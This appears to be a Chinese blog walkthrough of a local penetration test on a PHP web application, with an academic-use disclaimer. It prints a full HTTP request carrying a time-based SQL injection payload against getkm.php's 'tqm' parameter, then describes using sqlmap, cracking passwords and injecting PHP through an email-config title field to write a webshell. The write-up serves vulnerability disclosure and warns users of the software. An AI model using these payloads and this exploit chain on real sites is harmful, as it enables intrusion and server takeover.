本次渗透为本地测试,仅提供学术交流,切勿用于非法用途
找了个源码搭建好了
![f61eb680ddfcc485781041aa38e089d1.png](https://img-blog.csdnimg.cn/img_convert/f61eb680ddfcc485781041aa38e089d1.png)
后台地址为默认的
![a409cf8ef708b1b46e0ee39f93d79797.png](https://img-blog.csdnimg.cn/img_convert/a409cf8ef708b1b46e0ee39f93d79797.png)
接下来就是找找源码中一些关键的文件了,发现getkm.php可能存在注入
![bbbb18e5472e2eaeabc34585a0b78dd1.png](https://img-blog.csdnimg.cn/img_convert/bbbb18e5472e2eaeabc34585a0b78dd1.png)
直接代入tqm参数,我们看看包含的common.php文件有没有过滤机制
![1533eb09e63d9bf9cecec08c3f7a27de.png](https://img-blog.csdnimg.cn/img_convert/1533eb09e63d9bf9cecec08c3f7a27de.png)
貌似只有个防cc和一个360网站卫士,还好,能绕过。
POST /getkm.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: PHPSESSID=cidvriorg2as3nbgc575f6mhdr
Connection: close
Upgrade-Insecure-Requests: 1
tqm=11' AND (SELECT * FROM (SELECT(SLEEP(5)
构造一波,看看响应码
![c4f807b7027c1d6d45d168cc66fc1656.png](https://img-blog.csdnimg.cn/img_convert/c4f807b7027c1d6d45d168cc66fc1656.png)
丢sqlmap里面
![246301f4e76b65b20b4d29908e052cd9.png](https://img-blog.csdnimg.cn/img_convert/246301f4e76b65b20b4d29908e052cd9.png)
接下来就是常规跑密码,我就不说了。
getshell
![fc5e84cd3c4194c52494bd13262af0d7.png](https://img-blog.csdnimg.cn/img_convert/fc5e84cd3c4194c52494bd13262af0d7.png)
我们去跟进一下set.php文件
![775c8fd58d052d5389d9e8dd2eaeb280.png](https://img-blog.csdnimg.cn/img_convert/775c8fd58d052d5389d9e8dd2eaeb280.png)
包含emailconfig.php,继续跟进
![1f162e87d4f192059e425022540b8ee4.png](https://img-blog.csdnimg.cn/img_convert/1f162e87d4f192059e425022540b8ee4.png)
发现title处可以构造一下phpinfo
![bc7256fc1c7cd99eb7c7de26cb5a29f5.png](https://img-blog.csdnimg.cn/img_convert/bc7256fc1c7cd99eb7c7de26cb5a29f5.png)
成功执行
![988dbd087d46e963694d11819bc83e4c.png](https://img-blog.csdnimg.cn/img_convert/988dbd087d46e963694d11819bc83e4c.png)
这里就可以直接写shell了,构造个一句话
![9691866227f482fbf2b24d22a94462fe.png](https://img-blog.csdnimg.cn/img_convert/9691866227f482fbf2b24d22a94462fe.png)
也希望用这套源码的朋友,多多注意下!
制作不易,点个赞再走吧!
#网络安全在我身边#